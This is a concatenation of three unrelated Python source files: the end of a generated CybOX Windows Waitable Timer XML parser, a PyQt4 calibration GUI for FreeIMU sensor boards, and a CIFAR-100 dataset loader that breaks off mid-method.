def buildAttributes(self, node, attrs, already_processed):
super(WindowsWaitableTimerObjectType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Handle':
obj_ = win_handle_object.WindowsHandleObjectType.factory()
obj_.build(child_)
self.set_Handle(obj_)
elif nodeName_ == 'Name':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Name(obj_)
elif nodeName_ == 'Security_Attributes':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Security_Attributes(obj_)
elif nodeName_ == 'Type':
obj_ = WaitableTimerType.factory()
obj_.build(child_)
self.set_Type(obj_)
super(WindowsWaitableTimerObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class WindowsWaitableTimerObjectType
GDSClassesMapping = {
'Build_Utility': cybox_common.BuildUtilityType,
'Errors': cybox_common.ErrorsType,
'Time': cybox_common.TimeType,
'Certificate_Issuer': cybox_common.StringObjectPropertyType,
'Metadata': cybox_common.MetadataType,
'Hash': cybox_common.HashType,
'Information_Source_Type': cybox_common.ControlledVocabularyStringType,
'Block_Hash_Value': cybox_common.HashValueType,
'Fuzzy_Hash_Structure': cybox_common.FuzzyHashStructureType,
'SubDatum': cybox_common.MetadataType,
'Segment_Hash': cybox_common.HashValueType,
'Digital_Signature': cybox_common.DigitalSignatureInfoType,
'Code_Snippets': cybox_common.CodeSnippetsType,
'Value': cybox_common.StringObjectPropertyType,
'Length': cybox_common.IntegerObjectPropertyType,
'Encoding': cybox_common.ControlledVocabularyStringType,
'Internationalization_Settings': cybox_common.InternationalizationSettingsType,
'Tool_Configuration': cybox_common.ToolConfigurationType,
'Security_Attributes': cybox_common.StringObjectPropertyType,
'Object_Address': cybox_common.UnsignedLongObjectPropertyType,
'English_Translation': cybox_common.StringObjectPropertyType,
'Functions': cybox_common.FunctionsType,
'String_Value': cybox_common.StringObjectPropertyType,
'Pointer_Count': cybox_common.UnsignedLongObjectPropertyType,
'Build_Utility_Platform_Specification': cybox_common.PlatformSpecificationType,
'Compiler_Informal_Description': cybox_common.CompilerInformalDescriptionType,
'System': cybox_common.ObjectPropertiesType,
'Platform': cybox_common.PlatformSpecificationType,
'Usage_Context_Assumptions': cybox_common.UsageContextAssumptionsType,
'Type': win_handle_object.HandleType,
'Compilers': cybox_common.CompilersType,
'Tool_Type': cybox_common.ControlledVocabularyStringType,
'String': cybox_common.ExtractedStringType,
'Tool': cybox_common.ToolInformationType,
'Build_Information': cybox_common.BuildInformationType,
'Tool_Hashes': cybox_common.HashListType,
'Compiler_Platform_Specification': cybox_common.PlatformSpecificationType,
'Error_Instances': cybox_common.ErrorInstancesType,
'Data_Segment': cybox_common.StringObjectPropertyType,
'Certificate_Subject': cybox_common.StringObjectPropertyType,
'Language': cybox_common.StringObjectPropertyType,
'Property': cybox_common.PropertyType,
'Strings': cybox_common.ExtractedStringsType,
'File_System_Offset': cybox_common.IntegerObjectPropertyType,
'Reference_Description': cybox_common.StructuredTextType,
'User_Account_Info': cybox_common.ObjectPropertiesType,
'Configuration_Settings': cybox_common.ConfigurationSettingsType,
'Simple_Hash_Value': cybox_common.SimpleHashValueType,
'Byte_String_Value': cybox_common.HexBinaryObjectPropertyType,
'Instance': cybox_common.ObjectPropertiesType,
'Import': cybox_common.StringObjectPropertyType,
'Access_Mask': cybox_common.UnsignedLongObjectPropertyType,
'Identifier': cybox_common.PlatformIdentifierType,
'Tool_Specific_Data': cybox_common.ToolSpecificDataType,
'Execution_Environment': cybox_common.ExecutionEnvironmentType,
'ID': cybox_common.UnsignedIntegerObjectPropertyType,
'Dependencies': cybox_common.DependenciesType,
'Offset': cybox_common.IntegerObjectPropertyType,
'Date': cybox_common.DateRangeType,
'Hashes': cybox_common.HashListType,
'Segments': cybox_common.HashSegmentsType,
'Segment_Count': cybox_common.IntegerObjectPropertyType,
'Usage_Context_Assumption': cybox_common.StructuredTextType,
'Block_Hash': cybox_common.FuzzyHashBlockType,
'Dependency': cybox_common.DependencyType,
'Error': cybox_common.ErrorType,
'Trigger_Point': cybox_common.HexBinaryObjectPropertyType,
'Environment_Variable': cybox_common.EnvironmentVariableType,
'Byte_Run': cybox_common.ByteRunType,
'Contributors': cybox_common.PersonnelType,
'Image_Offset': cybox_common.IntegerObjectPropertyType,
'Imports': cybox_common.ImportsType,
'Library': cybox_common.LibraryType,
'References': cybox_common.ToolReferencesType,
'Windows_Handle': win_handle_object.WindowsHandleObjectType,
'Internal_Strings': cybox_common.InternalStringsType,
'Custom_Properties': cybox_common.CustomPropertiesType,
'Configuration_Setting': cybox_common.ConfigurationSettingType,
'Libraries': cybox_common.LibrariesType,
'Function': cybox_common.StringObjectPropertyType,
'Handle': win_handle_object.WindowsHandleObjectType,
'Description': cybox_common.StructuredTextType,
'Code_Snippet': cybox_common.ObjectPropertiesType,
'Build_Configuration': cybox_common.BuildConfigurationType,
'Address': cybox_common.HexBinaryObjectPropertyType,
'Search_Within': cybox_common.IntegerObjectPropertyType,
'Segment': cybox_common.HashSegmentType,
'Compiler': cybox_common.CompilerType,
'Name': cybox_common.StringObjectPropertyType,
'Signature_Description': cybox_common.StringObjectPropertyType,
'Block_Size': cybox_common.IntegerObjectPropertyType,
'Search_Distance': cybox_common.IntegerObjectPropertyType,
'Fuzzy_Hash_Value': cybox_common.FuzzyHashValueType,
'Dependency_Description': cybox_common.StructuredTextType,
'Contributor': cybox_common.ContributorType,
'Tools': cybox_common.ToolsInformationType,
'Data_Size': cybox_common.DataSizeType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print(USAGE_TEXT)
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Waitable_Timer'
rootClass = WindowsWaitableTimerObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout.write, 0, name_=rootTag,
# namespacedef_='',
# pretty_print=True)
return rootObj
def parseEtree(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Waitable_Timer'
rootClass = WindowsWaitableTimerObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
rootElement = rootObj.to_etree(None, name_=rootTag)
content = etree_.tostring(rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement
def parseString(inString):
from mixbox.vendor.six import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Windows_Waitable_Timer'
rootClass = WindowsWaitableTimerObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout.write, 0, name_="Windows_Waitable_Timer",
# namespacedef_='')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"WindowsWaitableTimerObjectType",
"WaitableTimerType"
]
|
|
"""
cal_gui.py - Calibration GUI for FreeIMU boards
Copyright (C) 2012 Fabio Varesano <fabio at varesano dot net>
Development of this code has been supported by the Department of Computer Science,
Universita' degli Studi di Torino, Italy within the Piemonte Project
http://www.piemonte.di.unito.it/
This program is free software: you can redistribute it and/or modify
it under the terms of the version 3 GNU General Public License as
published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys, os
from PyQt4.QtGui import QApplication, QDialog, QMainWindow, QCursor, QFileDialog
from ui_freeimu_cal import Ui_FreeIMUCal
from PyQt4.QtCore import Qt,QObject, pyqtSlot, QThread, QSettings, SIGNAL
import numpy as np
import serial, time
from struct import unpack, pack
from binascii import unhexlify
from subprocess import call
import pyqtgraph.opengl as gl
import cal_lib, numpy
from ctypes import util
try:
from OpenGL.platform import win32
except AttributeError:
pass
acc_file_name = "acc.txt"
magn_file_name = "magn.txt"
calibration_h_file_name = "calibration.h"
#####
##
## For 16-bit processors use word = 2
## For 32-bit processors use word = 4
##
#####
word = 2
acc_range = 25000
magn_range = 1000
class FreeIMUCal(QMainWindow, Ui_FreeIMUCal):
def __init__(self):
QMainWindow.__init__(self)
# Set up the user interface from Designer.
self.setupUi(self)
# load user settings
self.settings = QSettings("FreeIMU Calibration Application", "Fabio Varesano")
# restore previous serial port used
self.serialPortEdit.setText(self.settings.value("calgui/serialPortEdit", "").toString())
# Set up BaudRate
self.setBaudRateComboBox.currentIndexChanged.connect(self.selectionchange)
# when user hits enter, we generate the clicked signal to the button so that connections
self.connect(self.serialPortEdit, SIGNAL("returnPressed()"), self.connectButton, SIGNAL("clicked()"))
# Connect up the buttons to their functions
self.connectButton.clicked.connect(self.serial_connect)
self.samplingToggleButton.clicked.connect(self.sampling_start)
self.set_status("Disconnected")
# data storages
self.acc_data = [[], [], []]
self.magn_data = [[], [], []]
# setup graphs
self.accXY.setXRange(-acc_range, acc_range)
self.accXY.setYRange(-acc_range, acc_range)
self.accYZ.setXRange(-acc_range, acc_range)
self.accYZ.setYRange(-acc_range, acc_range)
self.accZX.setXRange(-acc_range, acc_range)
self.accZX.setYRange(-acc_range, acc_range)
self.accXY.setAspectLocked()
self.accYZ.setAspectLocked()
self.accZX.setAspectLocked()
self.magnXY.setXRange(-magn_range, magn_range)
self.magnXY.setYRange(-magn_range, magn_range)
self.magnYZ.setXRange(-magn_range, magn_range)
self.magnYZ.setYRange(-magn_range, magn_range)
self.magnZX.setXRange(-magn_range, magn_range)
self.magnZX.setYRange(-magn_range, magn_range)
self.magnXY.setAspectLocked()
self.magnYZ.setAspectLocked()
self.magnZX.setAspectLocked()
self.accXY_cal.setXRange(-1.5, 1.5)
self.accXY_cal.setYRange(-1.5, 1.5)
self.accYZ_cal.setXRange(-1.5, 1.5)
self.accYZ_cal.setYRange(-1.5, 1.5)
self.accZX_cal.setXRange(-1.5, 1.5)
self.accZX_cal.setYRange(-1.5, 1.5)
self.accXY_cal.setAspectLocked()
self.accYZ_cal.setAspectLocked()
self.accZX_cal.setAspectLocked()
self.magnXY_cal.setXRange(-1.5, 1.5)
self.magnXY_cal.setYRange(-1.5, 1.5)
self.magnYZ_cal.setXRange(-1.5, 1.5)
self.magnYZ_cal.setYRange(-1.5, 1.5)
self.magnZX_cal.setXRange(-1.5, 1.5)
self.magnZX_cal.setYRange(-1.5, 1.5)
self.magnXY_cal.setAspectLocked()
self.magnYZ_cal.setAspectLocked()
self.magnZX_cal.setAspectLocked()
self.acc3D.opts['distance'] = 30000
self.acc3D.show()
self.magn3D.opts['distance'] = 2000
self.magn3D.show()
ax = gl.GLAxisItem()
ax.setSize(x=20000, y=20000, z=20000)
self.acc3D.addItem(ax)
mx = gl.GLAxisItem()
mx.setSize(x=1000, y=1000, z=1000)
self.magn3D.addItem(ax)
self.acc3D_sp = gl.GLScatterPlotItem( color = (1, 1, 1, 1), size=2)
self.acc3D.addItem(self.acc3D_sp)
self.magn3D_sp = gl.GLScatterPlotItem( color = (1, 1, 1, 1), size=2)
self.magn3D.addItem(self.magn3D_sp)
# axis for the cal 3D graph
g_a = gl.GLAxisItem()
g_a.setSize(x=10000, y=10000, z=10000)
self.acc3D_cal.addItem(g_a)
g_m = gl.GLAxisItem()
g_m.setSize(x=1000, y=1000, z=1000)
self.magn3D_cal.addItem(g_m)
def selectionchange(self,i):
self.serial_baudrate = str(self.setBaudRateComboBox.currentText())
def set_status(self, status):
self.statusbar.showMessage(self.tr(status))
def serial_connect(self):
self.serial_port = str(self.serialPortEdit.text())
# save serial value to user settings
self.settings.setValue("calgui/serialPortEdit", self.serial_port)
self.settings.setValue("calgui/baudRateEdit", self.serial_baudrate)
self.connectButton.setEnabled(False)
# waiting mouse cursor
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
self.set_status("Connecting to " + self.serial_port + " ...")
# TODO: serial port field input validation!
try:
self.ser = serial.Serial(
port= self.serial_port,
baudrate=self.serial_baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
if self.ser.isOpen():
print "Arduino serial port opened correctly"
self.set_status("Connection Successfull. Waiting for Arduino reset...")
# wait for arduino reset on serial open
time.sleep(3)
self.ser.write('v') # ask version
self.set_status("Connected to: " + self.ser.readline()) # TODO: hangs if a wrong serial protocol has been loaded. To be fixed.
self.connectButton.setText("Disconnect")
self.connectButton.clicked.connect(self.serial_disconnect)
self.serialPortEdit.setEnabled(False)
self.serialProtocol.setEnabled(False)
self.samplingToggleButton.setEnabled(True)
self.clearCalibrationEEPROMButton.setEnabled(True)
self.clearCalibrationEEPROMButton.clicked.connect(self.clear_calibration_eeprom)
except serial.serialutil.SerialException, e:
self.connectButton.setEnabled(True)
self.set_status("Impossible to connect: " + str(e))
# restore mouse cursor
QApplication.restoreOverrideCursor()
self.connectButton.setEnabled(True)
def serial_disconnect(self):
print "Disconnecting from " + self.serial_port
self.ser.close()
self.set_status("Disconnected")
self.serialPortEdit.setEnabled(True)
self.serialProtocol.setEnabled(True)
self.connectButton.setText("Connect")
self.connectButton.clicked.disconnect(self.serial_disconnect)
self.connectButton.clicked.connect(self.serial_connect)
self.samplingToggleButton.setEnabled(False)
self.clearCalibrationEEPROMButton.setEnabled(False)
self.clearCalibrationEEPROMButton.clicked.disconnect(self.clear_calibration_eeprom)
def sampling_start(self):
self.serWorker = SerialWorker(ser = self.ser)
self.connect(self.serWorker, SIGNAL("new_data(PyQt_PyObject)"), self.newData)
self.serWorker.start()
print "Starting SerialWorker"
self.samplingToggleButton.setText("Stop Sampling")
self.samplingToggleButton.clicked.disconnect(self.sampling_start)
self.samplingToggleButton.clicked.connect(self.sampling_end)
def sampling_end(self):
self.serWorker.exiting = True
self.serWorker.quit()
self.serWorker.wait()
self.samplingToggleButton.setText("Start Sampling")
self.samplingToggleButton.clicked.disconnect(self.sampling_end)
self.samplingToggleButton.clicked.connect(self.sampling_start)
self.calibrateButton.setEnabled(True)
self.calAlgorithmComboBox.setEnabled(True)
self.calibrateButton.clicked.connect(self.calibrate)
def calibrate(self):
# read file and run calibration algorithm
(self.acc_offset, self.acc_scale) = cal_lib.calibrate_from_file(acc_file_name)
(self.magn_offset, self.magn_scale) = cal_lib.calibrate_from_file(magn_file_name)
# map floats into integers
self.acc_offset = map(int, self.acc_offset)
self.magn_offset = map(int, self.magn_offset)
# show calibrated tab
self.tabWidget.setCurrentIndex(1)
#populate acc calibration output on gui
self.calRes_acc_OSx.setText(str(self.acc_offset[0]))
self.calRes_acc_OSy.setText(str(self.acc_offset[1]))
self.calRes_acc_OSz.setText(str(self.acc_offset[2]))
self.calRes_acc_SCx.setText(str(self.acc_scale[0]))
self.calRes_acc_SCy.setText(str(self.acc_scale[1]))
self.calRes_acc_SCz.setText(str(self.acc_scale[2]))
#populate acc calibration output on gui
self.calRes_magn_OSx.setText(str(self.magn_offset[0]))
self.calRes_magn_OSy.setText(str(self.magn_offset[1]))
self.calRes_magn_OSz.setText(str(self.magn_offset[2]))
self.calRes_magn_SCx.setText(str(self.magn_scale[0]))
self.calRes_magn_SCy.setText(str(self.magn_scale[1]))
self.calRes_magn_SCz.setText(str(self.magn_scale[2]))
# compute calibrated data
self.acc_cal_data = cal_lib.compute_calibrate_data(self.acc_data, self.acc_offset, self.acc_scale)
self.magn_cal_data = cal_lib.compute_calibrate_data(self.magn_data, self.magn_offset, self.magn_scale)
# populate 2D graphs with calibrated data
self.accXY_cal.plot(x = self.acc_cal_data[0], y = self.acc_cal_data[1], clear = True, pen='r')
self.accYZ_cal.plot(x = self.acc_cal_data[1], y = self.acc_cal_data[2], clear = True, pen='g')
self.accZX_cal.plot(x = self.acc_cal_data[2], y = self.acc_cal_data[0], clear = True, pen='b')
self.magnXY_cal.plot(x = self.magn_cal_data[0], y = self.magn_cal_data[1], clear = True, pen='r')
self.magnYZ_cal.plot(x = self.magn_cal_data[1], y = self.magn_cal_data[2], clear = True, pen='g')
self.magnZX_cal.plot(x = self.magn_cal_data[2], y = self.magn_cal_data[0], clear = True, pen='b')
# populate 3D graphs with calibrated data
acc3D_cal_data = np.array(self.acc_cal_data).transpose()
magn3D_cal_data = np.array(self.magn_cal_data).transpose()
sp = gl.GLScatterPlotItem(pos=acc3D_cal_data, color = (1, 1, 1, 1), size=2)
self.acc3D_cal.addItem(sp)
sp = gl.GLScatterPlotItem(pos=magn3D_cal_data, color = (1, 1, 1, 1), size=2)
self.magn3D_cal.addItem(sp)
#enable calibration buttons to activate calibration storing functions
self.saveCalibrationHeaderButton.setEnabled(True)
self.saveCalibrationHeaderButton.clicked.connect(self.save_calibration_header)
self.saveCalibrationEEPROMButton.setEnabled(True)
self.saveCalibrationEEPROMButton.clicked.connect(self.save_calibration_eeprom)
def save_calibration_header(self):
text = """
/**
* FreeIMU calibration header. Automatically generated by FreeIMU_GUI.
* Do not edit manually unless you know what you are doing.
*/
#define CALIBRATION_H
const int acc_off_x = %d;
const int acc_off_y = %d;
const int acc_off_z = %d;
const float acc_scale_x = %f;
const float acc_scale_y = %f;
const float acc_scale_z = %f;
const int magn_off_x = %d;
const int magn_off_y = %d;
const int magn_off_z = %d;
const float magn_scale_x = %f;
const float magn_scale_y = %f;
const float magn_scale_z = %f;
"""
calibration_h_text = text % (self.acc_offset[0], self.acc_offset[1], self.acc_offset[2], self.acc_scale[0], self.acc_scale[1], self.acc_scale[2], self.magn_offset[0], self.magn_offset[1], self.magn_offset[2], self.magn_scale[0], self.magn_scale[1], self.magn_scale[2])
calibration_h_folder = QFileDialog.getExistingDirectory(self, "Select the Folder to which save the calibration.h file")
calibration_h_file = open(os.path.join(str(calibration_h_folder), calibration_h_file_name), "w")
calibration_h_file.write(calibration_h_text)
calibration_h_file.close()
self.set_status("Calibration saved to: " + str(calibration_h_folder) + calibration_h_file_name + " .\nRecompile and upload the program using the FreeIMU library to your microcontroller.")
def save_calibration_eeprom(self):
self.ser.write("c")
# pack data into a string
offsets = pack('<hhhhhh', self.acc_offset[0], self.acc_offset[1], self.acc_offset[2], self.magn_offset[0], self.magn_offset[1], self.magn_offset[2])
scales = pack('<ffffff', self.acc_scale[0], self.acc_scale[1], self.acc_scale[2], self.magn_scale[0], self.magn_scale[1], self.magn_scale[2])
# transmit to microcontroller
self.ser.write(offsets)
self.ser.write(scales)
self.set_status("Calibration saved to microcontroller EEPROM.")
# debug written values to console
print "Calibration values read back from EEPROM:"
self.ser.write("C")
for i in range(4):
print self.ser.readline()
def clear_calibration_eeprom(self):
self.ser.write("x")
# no feedback expected. we assume success.
self.set_status("Calibration cleared from microcontroller EEPROM.")
def newData(self, reading):
# only display last reading in burst
self.acc_data[0].append(reading[0])
self.acc_data[1].append(reading[1])
self.acc_data[2].append(reading[2])
self.magn_data[0].append(reading[6])
self.magn_data[1].append(reading[7])
self.magn_data[2].append(reading[8])
self.accXY.plot(x = self.acc_data[0], y = self.acc_data[1], clear = True, pen='r')
self.accYZ.plot(x = self.acc_data[1], y = self.acc_data[2], clear = True, pen='g')
self.accZX.plot(x = self.acc_data[2], y = self.acc_data[0], clear = True, pen='b')
self.magnXY.plot(x = self.magn_data[0], y = self.magn_data[1], clear = True, pen='r')
self.magnYZ.plot(x = self.magn_data[1], y = self.magn_data[2], clear = True, pen='g')
self.magnZX.plot(x = self.magn_data[2], y = self.magn_data[0], clear = True, pen='b')
acc_pos = numpy.array([self.acc_data[0],self.acc_data[1],self.acc_data[2]]).transpose()
self.acc3D_sp.setData(pos=acc_pos, color = (1, 1, 1, 1), size=2)
magn_pos = numpy.array([self.magn_data[0],self.magn_data[1],self.magn_data[2]]).transpose()
self.magn3D_sp.setData(pos=magn_pos, color = (1, 1, 1, 1), size=2)
class SerialWorker(QThread):
def __init__(self, parent = None, ser = None):
QThread.__init__(self, parent)
self.exiting = False
self.ser = ser
def run(self):
print "sampling start.."
self.acc_file = open(acc_file_name, 'w')
self.magn_file = open(magn_file_name, 'w')
count = 100
in_values = 9
self.ser.write("w")
word1 = self.ser.read()
word = chr(ord(word1))
self.ser.read(2)
reading = [0.0 for i in range(in_values)]
# read data for calibration
while not self.exiting:
# determine word size
self.ser.write('b')
self.ser.write(chr(count))
for j in range(count):
for i in range(in_values):
if word == '4':
reading[i] = unpack('hh', self.ser.read(4))[0]
if word == '2':
reading[i] = unpack('h', self.ser.read(2))[0]
self.ser.read(2) # consumes remaining '\r\n'
# prepare readings to store on file
acc_readings_line = "%d %d %d\r\n" % (reading[0], reading[1], reading[2])
self.acc_file.write(acc_readings_line)
#print(acc_readings_line)
magn_readings_line = "%d %d %d\r\n" % (reading[6], reading[7], reading[8])
self.magn_file.write(magn_readings_line)
# every count times we pass some data to the GUI
self.emit(SIGNAL("new_data(PyQt_PyObject)"), reading)
print ".",
# closing acc and magn files
self.acc_file.close()
self.magn_file.close()
return
def __del__(self):
self.exiting = True
self.wait()
print "SerialWorker exits.."
app = QApplication(sys.argv)
window = FreeIMUCal()
window.show()
sys.exit(app.exec_())
|
|
from library.utils import file_utils
import os, shutil, time
import numpy as np
from library.preprocessing.data_transform import transform
from library.datasets.cifar.base import CIFARBase
import h5py
class CIFAR100(CIFARBase):
def __init__(self,
num_images=1.0,
one_hot_encode=False,
train_validate_split=None,
preprocess='',
augment=False,
num_test_images=1.0,
endian='little',
save_h5py='',
make_image=True,
image_mode='rgb',
verbose=False):
"""
:param num_images:
:param one_hot_encode:
:param train_validate_split:
:param preprocess:
:param augment:
:param num_test_images:
:param endian:
:param save_h5py:
:param make_image:
:param image_mode:
:param verbose:
"""
super().__init__(num_images=num_images,
one_hot_encode=one_hot_encode,
train_validate_split=train_validate_split,
preprocess=preprocess,
augment=augment,
num_test_images=num_test_images,
endian=endian,
make_image=make_image,
image_mode=image_mode,
save_h5py=save_h5py,
verbose=verbose)
self.num_fine_classes = 20
self.num_coarse_classes = 100
self.file_url = 'https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz'
self.file_md5 = 'eb9058c3a382ffc7106e4002c42a8d85'
self.coarse_classes = \
['aquatic mammals', 'fish', 'flowers', 'food containers', 'fruit and vegetables',
'household electrical devices', 'household furniture', 'insects', 'large carnivores',
'large man-made outdoor things', 'large natural outdoor scenes', 'large omnivores and herbivores',
'medium-sized mammals', 'non-insect invertebrates', 'people', 'reptiles', 'small mammals',
'trees', 'vehicles 1', 'vehicles 2']
self.fine_classes = \
['beaver', 'dolphin', 'otter', 'seal', 'whale',
'aquarium fish', 'flatfish', 'ray', 'shark', 'trout',
'orchids', 'poppies', 'roses', 'sunflowers', 'tulips',
'bottles', 'bowls', 'cans', 'cups', 'plates',
'apples', 'mushrooms', 'oranges', 'pears', 'sweet peppers',
'clock', 'computer keyboard', 'lamp', 'telephone', 'television',
'bed', 'chair', 'couch', 'table', 'wardrobe',
'bee', 'beetle', 'butterfly', 'caterpillar', 'cockroach',
'bear', 'leopard', 'lion', 'tiger', 'wolf',
'bridge', 'castle', 'house', 'road', 'skyscraper',
'cloud', 'forest', 'mountain', 'plain', 'sea',
'camel', 'cattle', 'chimpanzee', 'elephant', 'kangaroo',
'fox', 'porcupine', 'possum', 'raccoon', 'skunk',
'crab', 'lobster', 'snail', 'spider', 'worm',
'baby', 'boy', 'girl', 'man', 'woman',
'crocodile', 'dinosaur', 'lizard', 'snake', 'turtle',
'hamster', 'mouse', 'rabbit', 'shrew', 'squirrel',
'maple', 'oak', 'palm', 'pine', 'willow',
'bicycle', 'bus', 'motorcycle', 'pickup truck', 'train',
'lawn-mower', 'rocket', 'streetcar', 'tank', 'tractor']
def download_and_extract_data(self, data_directory):
"""
:param data_directory:
:return:
"""
print('Downloading and extracting CIFAR 100 file')
## Step 1: Make the directories './datasets/cifar100/' if they do not exist
if not os.path.exists(data_directory):
if self.verbose is True:
print('Creating the directory \'%s\'' % data_directory)
file_utils.mkdir_p(data_directory)
else:
if self.verbose is True:
print('Directory \'%s\' already exists' % data_directory)
## Step 2: Check if './datasets/cifar100/cifar-100-python.tar.gz' exists
tar_file = data_directory + 'cifar-100.tar.gz'
make_tar = False
if not os.path.exists(tar_file):
make_tar = True
elif os.path.exists(tar_file) and not file_utils.verify_md5(tar_file, self.file_md5):
if self.verbose is True:
print('Removing the wrong file \'%s\'' % tar_file)
os.remove(tar_file)
make_tar = True
else:
if self.verbose is True:
print('CIFAR 100 tarfile exists and MD5 sum is verified')
## Step 3: Download CIFAR 100 dataset from 'http://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz'
if make_tar is True:
result = file_utils.download(self.file_url, tar_file, verbose=self.verbose)
if result is False:
if self.verbose is True:
raise FileNotFoundError('Download of CIFAR 100 dataset failed')
return False
result = file_utils.verify_md5(tar_file, self.file_md5, verbose=self.verbose)
if result is False:
if self.verbose is True:
raise FileNotFoundError('Downloaded CIFAR 100 dataset failed md5sum check')
return False
## Step 4: Extract the dataset
make_extract = False
batches_directory = data_directory + 'cifar-100-batches'
if not os.path.exists(batches_directory):
make_extract = True
else:
num_files = sum(os.path.isfile(os.path.join(batches_directory, f))
for f in os.listdir(batches_directory))
if num_files != 8:
shutil.rmtree(batches_directory)
make_extract = True
else:
if self.verbose is True:
print('Directory %s already exists' %batches_directory)
if make_extract is True:
print('Extracting file %s to %s' %(tar_file,batches_directory))
result = file_utils.extract(tar_file)
shutil.move('./cifar-100-python', batches_directory)
if result is False:
if self.verbose is True:
print('Extraction of CIFAR 100 dataset failed')
return False
else:
if self.verbose is True:
print('Extraction of CIFAR 100 dataset success')
return True
def dict_read(self, dict_file):
"""
:param dict_file:
:return:
"""
print(dict_file.keys())
fine_labels = dict_file[b'fine_labels']
coarse_labels = dict_file[b'coarse_labels']
data = dict_file[b'data']
batch_label = dict_file[b'batch_label']
filenames = dict_file[b'filenames']
if self.verbose is True:
print(dict_file.keys())
print(fine_labels[:5])
print(coarse_labels[:5])
print(batch_label[:5])
print(filenames[:5])
print(data[0].shape)
return data, fine_labels, coarse_labels, batch_label, filenames
def load_train_data(self, data_directory='/tmp/cifar100/'):
"""
:param data_directory:
:return:
"""
print('Loading CIFAR 100 Train Dataset')
basic_dir_path = data_directory + 'cifar-100-batches/'
data_batch_path = 'train'
data_files = [basic_dir_path + data_batch_path]
data_dict = [file_utils.unpickle(data_files[0])]
print('Reading unpicked data file: %s' % data_files[0])
data, fine_labels, coarse_labels, _, _ = self.dict_read(data_dict[0])
print(np.max(fine_labels))
print(np.max(coarse_labels))
data_fine_labels = fine_labels
data_coarse_labels = coarse_labels
data_images = np.array(data)
data_fine_labels = np.array(data_fine_labels)
data_coarse_labels = np.array(data_coarse_labels)
print('Success')
preprocessed_images = transform(data_images, transform_method=self.preprocess)
if self.make_image is True:
images = []
for fig_num in range(preprocessed_images.shape[0]):
fig = preprocessed_images[fig_num, :]
img = self.convert_images(fig, type=self.image_mode)
images.append(img)
images = np.array(images)
if self.train_validate_split is None:
self.train.data = np.array(preprocessed_images[:self.num_images, :])
if self.make_image is True:
self.train.images = np.array(images[:self.num_images, :])
self.train.fine_labels = np.array(data_fine_labels[:self.num_images])
self.train.coarse_labels = np.array(data_coarse_labels[:self.num_images])
self.train.fine_class_names = np.array(list(map(lambda x: self.fine_classes[x], self.train.fine_labels)))
print(self.fine_classes[:15])
print(self.train.fine_labels[:15])
print(self.train.fine_class_names[:15])
self.train.coarse_class_names = np.array(list(map(lambda x: self.coarse_classes[x], self.train.coarse_labels)))
else:
print('Requested to use only %d images' %self.num_images)
self.train.data = np.array(preprocessed_images[:self.num_train_images, :])
if self.make_image is True:
self.train.images = np.array(images[:self.num_train_images, :])
self.train.fine_labels = np.array(data_fine_labels[:self.num_train_images])
self.train.coarse_labels = np.array(data_coarse_labels[:self.num_train_images])
self.train.fine_class_names = np.array(list(map(lambda x: self.fine_classes[x], self.train.fine_labels)))
self.train.coarse_class_names = np.array(list(map(lambda x: self.coarse_classes[x], self.train.coarse_labels)))
self.validate.data = \
np.array(preprocessed_images[self.num_train_images:self.num_train_images+self.num_validate_images, :])
if self.make_image is True:
self.validate.images = np.array(images[self.num_train_images:self.num_train_images+self.num_validate_images, :])
self.validate.fine_labels = \
np.array(data_fine_labels[self.num_train_images:self.num_train_images+self.num_validate_images])
self.validate.coarse_labels = \
np.array(data_coarse_labels[self.num_train_images:self.num_train_images + self.num_validate_images])
self.validate.fine_class_names = np.array(list(map(lambda x: self.fine_classes[x],
self.validate.fine_labels)))
self.validate.coarse_class_names = np.array(list(map(lambda x: self.coarse_classes[x],
self.validate.coarse_labels)))
if self.one_hot_encode is True:
self.convert_one_hot_encoding(self.train.fine_labels, data_type='train', class_type='fine')
self.convert_one_hot_encoding(self.train.coarse_labels, data_type='train', class_type='coarse')
if self.train_validate_split is not None:
self.convert_one_hot_encoding(self.validate.fine_labels, data_type='validate', class_type='fine')
self.convert_one_hot_encoding(self.validate.coarse_labels, data_type='validate', class_type='coarse')
if self.save_h5py != '':
